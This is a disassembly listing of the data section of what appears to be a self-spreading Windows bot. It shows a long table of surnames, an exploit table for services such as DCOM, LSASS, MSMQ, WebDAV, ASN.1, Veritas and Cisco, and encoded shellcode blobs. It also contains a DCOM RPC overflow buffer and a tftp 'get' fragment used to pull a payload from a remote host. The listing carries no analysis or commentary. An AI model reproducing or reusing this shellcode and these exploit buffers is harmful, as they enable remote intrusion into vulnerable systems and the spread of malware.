dd offset aMocroft ; "Mocroft"
dd offset aModestino ; "Modestino"
dd offset aMoeller ; "Moeller"
dd offset aMohr ; "Mohr"
dd offset aMoiamedi ; "Moiamedi"
dd offset aMonque ; "Monque"
dd offset aMontilio ; "Montilio"
dd offset aMooredech_ ; "MooreDeCh."
dd offset aMorani ; "Morani"
dd offset aMoreton ; "Moreton"
dd offset aMorrison ; "Morrison"
dd offset aMorrow ; "Morrow"
dd offset aMortimer ; "Mortimer"
dd offset aMosher ; "Mosher"
dd offset aMosler ; "Mosler"
dd offset aMostafavi ; "Mostafavi"
dd offset aMotooka ; "Motooka"
dd offset aMudarri ; "Mudarri"
dd offset aMuello ; "Muello"
dd offset aMugnai ; "Mugnai"
dd offset aMulkern ; "Mulkern"
dd offset aMulroy ; "Mulroy"
dd offset aMumford ; "Mumford"
dd offset aMussachio ; "Mussachio"
dd offset aNaddeo ; "Naddeo"
dd offset aNapolitano ; "Napolitano"
dd offset aNardi ; "Nardi"
dd offset aNardone ; "Nardone"
dd offset aNaviaux ; "Naviaux"
dd offset aNayduch ; "Nayduch"
dd offset aNelson ; "Nelson"
dd offset aNenna ; "Nenna"
dd offset aNesci ; "Nesci"
dd offset aNeuman ; "Neuman"
dd offset aNewfeld ; "Newfeld"
dd offset aNewlin ; "Newlin"
dd offset aNg ; "Ng"
dd offset aNi_0 ; "Ni"
dd offset aNickerson ; "Nickerson"
dd offset aNickoloff ; "Nickoloff"
dd offset aNisenson ; "Nisenson"
dd offset aNitabach ; "Nitabach"
dd offset aNotman ; "Notman"
dd offset aNuzum ; "Nuzum"
dd offset aOcougne ; "Ocougne"
dd offset aOgata ; "Ogata"
dd offset aOh ; "Oh"
dd offset aOHagan ; "O'hagan"
dd offset aOldford ; "Oldford"
dd offset aOlsen ; "Olsen"
dd offset aOlson ; "Olson"
dd offset aOlszewski ; "Olszewski"
dd offset aOMalley ; "O'malley"
dd offset aOman ; "Oman"
dd offset aOMeara ; "O'meara"
dd offset aOpel ; "Opel"
dd offset aOray ; "Oray"
dd offset aOrfield ; "Orfield"
dd offset aOrsi ; "Orsi"
dd offset aOspina ; "Ospina"
dd offset aOstrowski ; "Ostrowski"
dd offset aOttaviani ; "Ottaviani"
dd offset aOtten ; "Otten"
dd offset aOuchida ; "Ouchida"
dd offset aOvid ; "Ovid"
dd offset aPaesdealmeida ; "PaesDealmeida"
dd offset aPaine ; "Paine"
dd offset aPalayoor ; "Palayoor"
dd offset aPalepu ; "Palepu"
dd offset aPallara ; "Pallara"
dd offset aPalmitesta ; "Palmitesta"
dd offset aPanadero ; "Panadero"
dd offset aPanizzon ; "Panizzon"
dd offset aPantilla ; "Pantilla"
dd offset aPaoletti ; "Paoletti"
dd offset aParmeggiani ; "Parmeggiani"
dd offset aParris ; "Parris"
dd offset aPartridge ; "Partridge"
dd offset aPascucci ; "Pascucci"
dd offset aPatefield ; "Patefield"
dd offset aPatrick ; "Patrick"
dd offset aPattullo ; "Pattullo"
dd offset aPavetti ; "Pavetti"
dd offset aPavlon ; "Pavlon"
dd offset aPawloski ; "Pawloski"
dd offset aPaynter ; "Paynter"
dd offset aPeabody ; "Peabody"
dd offset aPearlberg ; "Pearlberg"
dd offset aPederson ; "Pederson"
dd offset aPeishel ; "Peishel"
dd offset aPenny ; "Penny"
dd offset aPereira ; "Pereira"
dd offset aPerko ; "Perko"
dd offset aPerlak ; "Perlak"
dd offset aPerlman ; "Perlman"
dd offset aPerna ; "Perna"
dd offset aPerone ; "Perone"
dd offset aPerrimon ; "Perrimon"
dd offset aPeters ; "Peters"
dd offset aPetruzello ; "Petruzello"
dd offset aPettibone ; "Pettibone"
dd offset aPettit ; "Pettit"
dd offset aPfister ; "Pfister"
dd offset aPilbeam ; "Pilbeam"
dd offset aPinot ; "Pinot"
dd offset aPlancon ; "Plancon"
dd offset aPlant ; "Plant"
dd offset aPlasket ; "Plasket"
dd offset aPlous ; "Plous"
dd offset aPo ; "Po"
dd offset aPocobene ; "Pocobene"
dd offset aPoincaire ; "Poincaire"
dd offset aPointer ; "Pointer"
dd offset aPoirier ; "Poirier"
dd offset aPolak ; "Polak"
dd offset aPolanyi ; "Polanyi"
dd offset aPolitis ; "Politis"
dd offset aPoma ; "Poma"
dd offset aPoolman ; "Poolman"
dd offset aPowers ; "Powers"
dd offset aPresper ; "Presper"
dd offset aPreucel ; "Preucel"
dd offset aPrevost ; "Prevost"
dd offset aPritchard ; "Pritchard"
dd offset aPritz ; "Pritz"
dd offset aProietti ; "Proietti"
dd offset aProthrowStith ; "Prothrow-Stith"
dd offset aPuccia ; "Puccia"
dd offset aPugh ; "Pugh"
dd offset aPynchon ; "Pynchon"
dd offset aQuaday ; "Quaday"
dd offset aQuetin ; "Quetin"
dd offset aRabe ; "Rabe"
dd offset aRabkin ; "Rabkin"
dd offset aRadeke ; "Radeke"
dd offset aRajagopalan ; "Rajagopalan"
dd offset aRaney ; "Raney"
dd offset aRangan ; "Rangan"
dd offset aRankin ; "Rankin"
dd offset aRapple ; "Rapple"
dd offset aRayport ; "Rayport"
dd offset aReddenTyler ; "Redden-Tyler"
dd offset aReedquist ; "Reedquist"
dd offset aCunningham ; "Cunningham"
dd offset aReinold ; "Reinold"
dd offset aRemak ; "Remak"
dd offset aRenick ; "Renick"
dd offset aRepetto ; "Repetto"
dd offset aResnik ; "Resnik"
dd offset aRhea ; "Rhea"
dd offset aRichmond ; "Richmond"
dd offset aRielly ; "Rielly"
dd offset aRindos ; "Rindos"
dd offset aRineer ; "Rineer"
dd offset aRish ; "Rish"
dd offset aRivera ; "Rivera"
dd offset aRobinson ; "Robinson"
dd offset aRocha ; "Rocha"
dd offset aRoesler ; "Roesler"
dd offset aRogers ; "Rogers"
dd offset aRonen ; "Ronen"
dd offset aRow ; "Row"
dd offset aRoyal ; "Royal"
dd offset aRu ; "Ru"
dd offset aRuan ; "Ruan"
dd offset aRuderman ; "Ruderman"
dd offset aRuescher ; "Ruescher"
dd offset aRush ; "Rush"
dd offset aRyu ; "Ryu"
dd offset aSabatello ; "Sabatello"
dd offset aSadler ; "Sadler"
dd offset aSafire ; "Safire"
dd offset aSahu ; "Sahu"
dd offset aSali ; "Sali"
dd offset aSamson ; "Samson"
dd offset aSanchezRamirez ; "Sanchez-Ramirez"
dd offset aSanna ; "Sanna"
dd offset aSapers ; "Sapers"
dd offset aSarin ; "Sarin"
dd offset aSartore ; "Sartore"
dd offset aSase ; "Sase"
dd offset aSatin ; "Satin"
dd offset aSatta ; "Satta"
dd offset aSatterthwaite ; "Satterthwaite"
dd offset aSawtell ; "Sawtell"
dd offset aSayied ; "Sayied"
dd offset aScarponi ; "Scarponi"
dd offset aScepan ; "Scepan"
dd offset aScharf ; "Scharf"
dd offset aScharlemann ; "Scharlemann"
dd offset aScheiner ; "Scheiner"
dd offset aSchiano ; "Schiano"
dd offset aSchifini ; "Schifini"
dd offset aSchilling ; "Schilling"
dd offset aSchmitt ; "Schmitt"
dd offset aSchossberger ; "Schossberger"
dd offset aSchuman ; "Schuman"
dd offset aSchutte ; "Schutte"
dd offset aSchuyler ; "Schuyler"
dd offset aSchwan ; "Schwan"
dd offset aSchwickrath ; "Schwickrath"
dd offset aScovel ; "Scovel"
dd offset aScudder ; "Scudder"
dd offset aSeaton ; "Seaton"
dd offset aSeeber ; "Seeber"
dd offset aSegal ; "Segal"
dd offset aSekler ; "Sekler"
dd offset aSelvage ; "Selvage"
dd offset aSen ; "Sen"
dd offset aSennett ; "Sennett"
dd offset aSeterdahl ; "Seterdahl"
dd offset aSexton ; "Sexton"
dd offset aSeyfert ; "Seyfert"
dd offset aShaikh ; "Shaikh"
dd offset aShakis ; "Shakis"
dd offset aShankland ; "Shankland"
dd offset aShanley ; "Shanley"
dd offset aShar ; "Shar"
dd offset aShatrov ; "Shatrov"
dd offset aShavelson ; "Shavelson"
dd offset aShea ; "Shea"
dd offset aSheats ; "Sheats"
dd offset aShepherd ; "Shepherd"
dd offset aSheppard ; "Sheppard"
dd offset aShepstone ; "Shepstone"
dd offset aShesko ; "Shesko"
dd offset aShia ; "Shia"
dd offset aShibata ; "Shibata"
dd offset aShimon ; "Shimon"
dd offset aSiesto ; "Siesto"
dd offset aSigalot ; "Sigalot"
dd offset aSigini ; "Sigini"
dd offset aSigna ; "Signa"
dd offset aSilverman ; "Silverman"
dd offset aSilvetti ; "Silvetti"
dd offset aSinsabaugh ; "Sinsabaugh"
dd offset aSirilli ; "Sirilli"
dd offset aSites ; "Sites"
dd offset aSkane ; "Skane"
dd offset aSkerry ; "Skerry"
dd offset aSkoda ; "Skoda"
dd offset aSloan ; "Sloan"
dd offset aSlowe ; "Slowe"
dd offset aSmilow ; "Smilow"
dd offset aSniffen ; "Sniffen"
dd offset aSnodgrass ; "Snodgrass"
dd offset aSocolow ; "Socolow"
dd offset aSolon ; "Solon"
dd offset aSomers ; "Somers"
dd offset aSommariva ; "Sommariva"
dd offset aSorabella ; "Sorabella"
dd offset aSorg ; "Sorg"
dd offset aSottak ; "Sottak"
dd offset aSoukup ; "Soukup"
dd offset aSoule ; "Soule"
dd offset aSoultanian ; "Soultanian"
dd offset aSpanier ; "Spanier"
dd offset aSparrow ; "Sparrow"
dd offset aSpaulding ; "Spaulding"
dd offset aSpeizer ; "Speizer"
dd offset aSpence ; "Spence"
dd offset aSperber ; "Sperber"
dd offset aSpicer ; "Spicer"
dd offset aSpiegelhalter ; "Spiegelhalter"
dd offset aSpiliotis ; "Spiliotis"
dd offset aSpinrad ; "Spinrad"
dd offset aStmartin ; "StMartin"
dd offset aStalvey ; "Stalvey"
dd offset aStam ; "Stam"
dd offset aStang ; "Stang"
dd offset aStassinopolus ; "Stassinopolus"
dd offset aStates ; "States"
dd offset aStatlender ; "Statlender"
dd offset aStefani ; "Stefani"
dd offset aSteiner ; "Steiner"
dd offset aStephanian ; "Stephanian"
dd offset aStepniewska ; "Stepniewska"
dd offset aStewartOaten ; "Stewart-Oaten"
dd offset aStiepock ; "Stiepock"
dd offset aStillwell ; "Stillwell"
dd offset aStock ; "Stock"
dd offset aStockton ; "Stockton"
dd offset aStockwell ; "Stockwell"
dd offset aStolzenberg ; "Stolzenberg"
dd offset aStonich ; "Stonich"
dd offset aStorer ; "Storer"
dd offset aStott ; "Stott"
dd offset aStrange ; "Strange"
dd offset aStrauch ; "Strauch"
dd offset aStreiff ; "Streiff"
dd offset aStringer ; "Stringer"
dd offset aSullivan ; "Sullivan"
dd offset aSumner ; "Sumner"
dd offset aSuo ; "Suo"
dd offset aSurdam ; "Surdam"
dd offset aSweeting ; "Sweeting"
dd offset aSweetser ; "Sweetser"
dd offset aSwindle ; "Swindle"
dd offset aTagiuri ; "Tagiuri"
dd offset aTai ; "Tai"
dd offset aTalaugon ; "Talaugon"
dd offset aTambiah ; "Tambiah"
dd offset aTandler ; "Tandler"
dd offset aTanowitz ; "Tanowitz"
dd offset aTatar ; "Tatar"
dd offset aTaveras ; "Taveras"
dd offset aTawn ; "Tawn"
dd offset aTcherepnin ; "Tcherepnin"
dd offset aTeague ; "Teague"
dd offset aTemes ; "Temes"
dd offset aTemmer ; "Temmer"
dd offset aTenney ; "Tenney"
dd offset aTerracini ; "Terracini"
dd offset aThan ; "Than"
dd offset aThavaneswaran ; "Thavaneswaran"
dd offset aTheodos ; "Theodos"
dd offset aThibault ; "Thibault"
dd offset aThisted ; "Thisted"
dd offset aThomsen ; "Thomsen"
dd offset aThroop ; "Throop"
dd offset aTierney ; "Tierney"
dd offset aTill ; "Till"
dd offset aTimmons ; "Timmons"
dd offset aTofallis ; "Tofallis"
dd offset aTollestrup ; "Tollestrup"
dd offset aTolls ; "Tolls"
dd offset aTolman ; "Tolman"
dd offset aTomford ; "Tomford"
dd offset aToomer ; "Toomer"
dd offset aTopulos ; "Topulos"
dd offset aTorresi ; "Torresi"
dd offset aTorske ; "Torske"
dd offset aTowler ; "Towler"
dd offset aToye ; "Toye"
dd offset aTraebert ; "Traebert"
dd offset aTrenga ; "Trenga"
dd offset aTrewin ; "Trewin"
dd offset aTringali ; "Tringali"
dd offset aTroiani ; "Troiani"
dd offset aTroy ; "Troy"
dd offset aTruss ; "Truss"
dd offset aTsiatis ; "Tsiatis"
dd offset aTsomides ; "Tsomides"
dd offset aTsukurov ; "Tsukurov"
dd offset aTuck ; "Tuck"
dd offset aTudge ; "Tudge"
dd offset aTukan ; "Tukan"
dd offset aTurano ; "Turano"
dd offset aTurek ; "Turek"
dd offset aTuttle ; "Tuttle"
dd offset aTwells ; "Twells"
dd offset aTzamarias ; "Tzamarias"
dd offset aUllman ; "Ullman"
dd offset aUntermeyer ; "Untermeyer"
dd offset aUpsdell ; "Upsdell"
dd offset aUrban ; "Urban"
dd offset aUrdangBrown ; "Urdang-Brown"
dd offset aUsdan ; "Usdan"
dd offset aUzuner ; "Uzuner"
dd offset aVacca ; "Vacca"
dd offset aWaite ; "Waite"
dd offset aValberg ; "Valberg"
dd offset aValencia ; "Valencia"
dd offset aWales ; "Wales"
dd offset aWallenberg ; "Wallenberg"
dd offset aWalter ; "Walter"
dd offset aVanallen ; "vanAllen"
dd offset aVanzwet ; "VanZwet"
dd offset aVandenberg ; "Vandenberg"
dd offset aVanheeckeren ; "Vanheeckeren"
dd offset aWarshafsky ; "Warshafsky"
dd offset aWasowska ; "Wasowska"
dd offset aVasquez ; "Vasquez"
dd offset aWaugh ; "Waugh"
dd offset aWeighart ; "Weighart"
dd offset aWeingarten ; "Weingarten"
dd offset aWeinhaus ; "Weinhaus"
dd offset aWeissbourd ; "Weissbourd"
dd offset aWeissman ; "Weissman"
dd offset aVelasquez ; "Velasquez"
dd offset aWelles ; "Welles"
dd offset aWelsh ; "Welsh"
dd offset aWengret ; "Wengret"
dd offset aVenne ; "Venne"
dd offset aVerghese ; "Verghese"
dd offset aWescott ; "Wescott"
dd offset aWetzel ; "Wetzel"
dd offset aWhately ; "Whately"
dd offset aWhilton ; "Whilton"
dd offset aWhite ; "White"
dd offset aWhitla ; "Whitla"
dd offset aWhittaker ; "Whittaker"
dd offset aViana ; "Viana"
dd offset aViano ; "Viano"
dd offset aWiedersheim ; "Wiedersheim"
dd offset aWiener ; "Wiener"
dd offset aViens ; "Viens"
dd offset aVignola ; "Vignola"
dd offset aWilder ; "Wilder"
dd offset aWilhelm ; "Wilhelm"
dd offset aWilk ; "Wilk"
dd offset aWilkin ; "Wilkin"
dd offset aWilkinson ; "Wilkinson"
dd offset aVillarreal ; "Villarreal"
dd offset aWillstatter ; "Willstatter"
dd offset aWilson ; "Wilson"
dd offset aVitali ; "Vitali"
dd offset aViviani ; "Viviani"
dd offset aVoigt ; "Voigt"
dd offset aWolk ; "Wolk"
dd offset aVonhoffman ; "VonHoffman"
dd offset aWoo ; "Woo"
dd offset aWooden ; "Wooden"
dd offset aWoods ; "Woods"
dd offset aWoodsPowell ; "Woods-Powell"
dd offset byte_430020
dd offset aVotey ; "Votey"
dd offset aYacono ; "Yacono"
dd offset aYamane ; "Yamane"
dd offset aYankee ; "Yankee"
dd offset aYarchuk ; "Yarchuk"
dd offset aYates ; "Yates"
dd offset aYbarra ; "Ybarra"
dd offset aYedidia ; "Yedidia"
dd offset aYesson ; "Yesson"
dd offset aYetiv ; "Yetiv"
dd offset aYoffe ; "Yoffe"
dd offset aYoo ; "Yoo"
dd offset aYoukSee ; "Youk-See"
dd offset aYu ; "Yu"
dd offset aZachary ; "Zachary"
dd offset aZahedi ; "Zahedi"
dd offset aZangwill ; "Zangwill"
dd offset aZegans ; "Zegans"
dd offset aZerbini ; "Zerbini"
dd offset aZoldak ; "Zoldak"
dd offset aZucconi ; "Zucconi"
dd offset aZurn ; "Zurn"
dd offset aZwiers ; "Zwiers"
dd offset aZytowski ; "Zytowski"
align 8
dword_43D758 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40AD00+BE�o
db 66h, 0B9h
word_43D766 dw 0FFFFh ; DATA XREF: sub_40AD00+C6�w
db 80h, 73h, 0Eh
byte_43D76B db 0FFh ; DATA XREF: sub_40AD00+CD�w
dd 0F9E243h
dword_43D770 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40AD00+9C�o
db 0B1h
byte_43D77D db 0FFh ; DATA XREF: sub_40AD00+A4�w
dw 7380h
db 0Ch
byte_43D781 db 0FFh ; DATA XREF: sub_40AD00+AA�w
dw 0E243h
dd 0F9h
dword_43D788 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_40AC0D+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_43D7EC dd 12h ; DATA XREF: sub_40AC0D+3B�w
dd 70746674h, 6578652Eh, 20692D20h
aGet db ' get ',0 ; DATA XREF: sub_40AC0D+7C�o
; sub_40AC0D+9E�o
aJ_1 db 'j',0
db 0E8h
dword_43D805 dd 17h ; DATA XREF: sub_40AC0D+4D�w
db 75h, 1, 0C3h
db 0E8h
dword_43D80D dd 1 ; DATA XREF: sub_40AC0D+43�w
byte_43D811 db 0, 6Ah, 0 ; DATA XREF: sub_40AC0D+C0�o
dd 7E8h
db 0, 0Fh, 84h
dword_43D81B dd 0FFFFFFEDh ; DATA XREF: sub_40AC0D+5D�w
db 0C3h
dd 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h, 44B0AAF3h
dd 515257ABh, 6A286A51h, 55515101h, 83D6FF53h, 0C08554C4h
dd 0C3h, 0
; char aNetbios_0[]
aNetbios_0 db 'netbios',0 ; DATA XREF: sub_40BCF3+151�o
; sub_40C15B+51�o
db 2 dup(0)
aNetbios db 'NetBios',0 ; DATA XREF: sub_40B553+30�o
; .text:0040C6D0�o ...
align 4
dd 5 dup(0)
dword_43D878 dd 8Bh ; DATA XREF: sub_40274D+1BB0�r
; sub_40274D+1BD9�o ...
off_43D87C dd offset sub_4100AE ; DATA XREF: sub_40BCF3+1CD�r
dword_43D880 dd 0 ; DATA XREF: sub_40B3C5+2E�o
; .text:0040C71B�r ...
dword_43D884 dd 0 ; DATA XREF: sub_40B690+1E�r
dword_43D888 dd 0 ; DATA XREF: sub_40B690+3AA�r
dword_43D88C dd 0 ; DATA XREF: sub_40B690+285�r
aNtpass db 'ntpass',0
align 4
dd 544E0000h, 73736150h, 6 dup(0)
dd 1BDh, 4100AEh, 4 dup(0)
aDcom135 db 'dcom135',0
dd 43440000h, 31204D4Fh, 3533h, 5 dup(0)
dd 87h, 40CC47h, 0
dd 1, 2 dup(0)
aDcom445 db 'dcom445',0
dd 43440000h, 34204D4Fh, 3534h, 5 dup(0)
dd 1BDh, 40CC47h, 0
dd 1, 2 dup(0)
aDcom1025 db 'dcom1025',0
align 2
aDcom1025_0 db 'DCOM 1025',0
dd 5 dup(0)
dd 401h, 40CC47h, 0
dd 1, 2 dup(0)
aLsass db 'lsass',0
align 4
dd 4F480000h, 534C2044h, 535341h, 5 dup(0)
dd 1BDh, 40DC47h, 0
dd 1, 2 dup(0)
aLsasscb db 'lsasscb',0
dd 4F480000h, 534C2044h, 2D535341h, 4243h, 4 dup(0)
dd 1BDh, 40E220h, 0
dd 1, 0
dd 1, 7361736Ch, 35333173h, 4C500000h, 53534153h, 35333120h
dd 5 dup(0)
dd 87h, 4102B1h, 0
dd 1, 2 dup(0)
aLsass445 db 'lsass445',0
align 2
aPlsass445 db 'PLSASS 445',0
align 4
dd 4 dup(0)
dd 1BDh, 4102B1h, 0
dd 1, 2 dup(0)
aLsass1025 db 'lsass1025',0
aPlsass1025 db 'PLSASS 1025',0
align 4
dd 4 dup(0)
dd 401h, 4102B1h, 0
dd 1, 2 dup(0)
aWks_eng db 'wks_eng',0
dd 6B570000h, 63765373h, 676E4520h, 6873696Ch, 4 dup(0)
dd 1BDh, 4113B7h, 0
dd 1, 2 dup(0)
aWks_oth db 'wks_oth',0
dd 6B570000h, 63765373h, 68744F20h, 7265h, 4 dup(0)
dd 1BDh, 41143Fh, 0
dd 1, 2 dup(0)
aMsgsvc db 'msgsvc',0
align 4
dd 654D0000h, 6E657373h, 726567h, 5 dup(0)
dd 87h, 40E596h, 0
dd 1, 2 dup(0)
aMsmq2103 db 'msmq2103',0
align 2
aMsmq2103_0 db 'MSMQ 2103',0
dd 5 dup(0)
dd 837h, 40FB58h, 0
dd 1, 2 dup(0)
aMsmq2105 db 'msmq2105',0
align 2
aMsmq2105_0 db 'MSMQ 2105',0
dd 5 dup(0)
dd 839h, 40FB58h, 0
dd 1, 2 dup(0)
aMsmq2107 db 'msmq2107',0
align 2
aMsmq2107_0 db 'MSMQ 2107',0
dd 5 dup(0)
dd 83Bh, 40FB58h, 0
dd 1, 2 dup(0)
aIis5ssl db 'iis5ssl',0
dd 49490000h, 53533553h, 4Ch, 5 dup(0)
dd 1BBh, 40CF1Eh, 0
dd 1, 0
dd 1, 64626577h, 7661h, 65570000h, 56414462h, 6 dup(0)
dd 50h, 410DA7h, 0
dd 1, 2 dup(0)
aVeritas db 'veritas',0
dd 65560000h, 61746972h, 61422073h, 70756B63h, 65784520h
dd 63h, 2 dup(0)
dd 17D5h, 410BAEh, 0
dd 1, 2 dup(0)
aAsn1http db 'asn1http',0
align 2
aAsn_1Http db 'ASN.1-HTTP',0
align 4
dd 4 dup(0)
dd 50h, 40F6D1h, 0
dd 1, 2 dup(0)
aAsn1smb db 'asn1smb',0
dd 53410000h, 2D312E4Eh, 424D53h, 5 dup(0)
dd 1BDh, 40F6D1h, 0
dd 1, 2 dup(0)
aAsn1smbnt db 'asn1smbnt',0
aAsn_1SmbNt db 'ASN.1-SMB NT',0
align 4
dd 4 dup(0)
dd 8Bh, 40F6D1h, 0
dd 1, 2 dup(0)
aUmpnp db 'umpnp',0
align 4
dd 4D550000h, 506E50h, 6 dup(0)
dd 1BDh, 4106C6h, 0
dd 1, 2 dup(0)
aImail_0 db 'imail',0
align 4
dd 4D490000h, 6C6961h, 6 dup(0)
dd 8Fh, 40D12Ch, 0
dd 1, 2 dup(0)
aMersin db 'mersin',0
align 4
dd 4E560000h, 6F6F5243h, 726574h, 5 dup(0)
dd 170Ch, 41DDECh, 0
dd 1, 2 dup(0)
aCisco23 db 'cisco23',0
dd 69430000h, 206F6373h, 6E6C6554h, 7465h, 4 dup(0)
dd 17h, 40C5C6h, 4 dup(0)
aCisco80 db 'cisco80',0
dd 69430000h, 206F6373h, 50545448h, 5 dup(0)
dd 50h, 40C731h, 14h dup(0)
aLsass445_0 db 'lsass445',0
align 2
byte_43DF5A db 1 ; DATA XREF: sub_40274D:loc_404279�r
; sub_40274D+1B36�o
aMsmq2103_1 db 'msmq2103',0
dd 73610100h, 6D73316Eh, 62h, 1, 3 dup(0)
dd 4A5A10EBh, 0B966C933h, 34800166h, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999899h, 699521C3h, 9912E664h, 3485E912h
dd 1291D912h, 0A5EA1241h, 0EF126A9Ah, 126A9AE1h, 629AB9E7h
dd 0AA8DD712h, 0C8CECF74h, 629AA612h, 97F36B12h, 0ED3F6AC0h
dd 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h, 0DF125412h, 485A9ABDh
dd 0AA589A78h, 9112FF50h, 9A85DF12h, 9B78585Ah, 9912589Ah
dd 63125A9Ah, 5F1A6E12h, 0F3491297h, 0E571C09Ah, 1A999999h
dd 0CFCB945Fh, 0C365CE66h, 9DF34112h, 99F071C0h, 0C9C99999h
dd 98F3C9C9h, 0CE669BF3h, 5E411269h, 9E999B9Eh, 1059AA24h
dd 89F39DDEh, 0CE66CACEh, 0CA98F36Dh, 0C961CE66h, 0CE66CAC9h
dd 0DD751A65h, 42AA6D12h, 10C089F3h, 627B1785h, 10A1DF10h
dd 0DF10A5DFh, 0B5DF5ED9h, 99999898h, 0C989DE14h, 0CACACACFh
dd 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h, 0CAC9A5DEh, 0C97DCE66h
dd 0AA71CE66h, 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h
dd 5A59AA77h, 66676271h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h
dd 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh
dd 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh, 0D5FDF8F6h, 0F8EBFBF0h
dd 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh, 0F6CAD8CAh, 0EDFCF2FAh
dd 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h, 0FAF899F7h, 0EDE9FCFAh
dd 99h
dword_43E100 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: .text:0040CD25�o
; .text:0040CE62�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_43E150 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_40CA2C+EB�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_43E4B4 dd 20h, 0 ; DATA XREF: sub_40CA2C+FE�o
dd 20h, 5C005Ch, 0
off_43E4C8 dd offset aWolk+4 ; DATA XREF: sub_40CA2C+12C�o
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 8
dword_43E508 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 ; DATA XREF: sub_40CA2C+143�o
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_40CA2C+18�o
; sub_40CA2C+59�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrr_0 db ''
db ''
db '',0
dword_43E618 dd 10016C6h ; DATA XREF: sub_40CA2C+CC�o
dword_43E61C dd 100139Dh ; DATA XREF: sub_40CA2C+C3�o
dword_43E620 dd 0E983C931h, 0D9EED9B0h, 5BF42474h, 2B137381h, 8313778Dh
; DATA XREF: sub_40CA2C+3C�o
dd 0F4E2FCEBh, 5E9CE7D7h, 0EC8874C3h, 7FFCEDD4h, 56FCA90Fh
dd 160B0617h, 98988C53h, 4CFC9564h, 5A9C8C0Bh, 12FCB9A0h
dd 8AB7BCC5h, 67B70987h, 1EBD4C2Ch, 0E79C4F2Ah, 3B53D910h
dd 4CFC685Eh, 759C8C0Fh, 983C81A0h, 0F8769174h, 9AFCA128h
dd 726BA947h, 77ACBCE8h, 9847CEA0h, 63FC816Bh, 53FC2037h
dd 9D1FD323h, 439B8365h, 40115BD4h, 2144E54Dh, 2104FA43h
dd 0C388D974h, 0EF9A4643h, 0C588DD10h, 75920474h, 117F60AAh
dd 0EC75E77Eh, 1AAEE5FBh, 0EC2020DEh, 4024DEFDh, 4034DE78h
dd 0C388DE68h, 0D470E54Dh, 0F2FEDE4Dh, 9D3E5BEh, 0EC204A5Bh
dd 4267E7FDh, 7BA7727Eh, 0FA59208Fh, 40A1727Ch, 7BA7727Eh
dd 5AF1C4CEh, 43A1727Ch, 0EC22D97Fh, 0F41F1EFBh, 440E4B52h
dd 0EC225BD4h, 771DEBFBh, 7E14E54Dh, 431D68A2h, 9ABBA472h
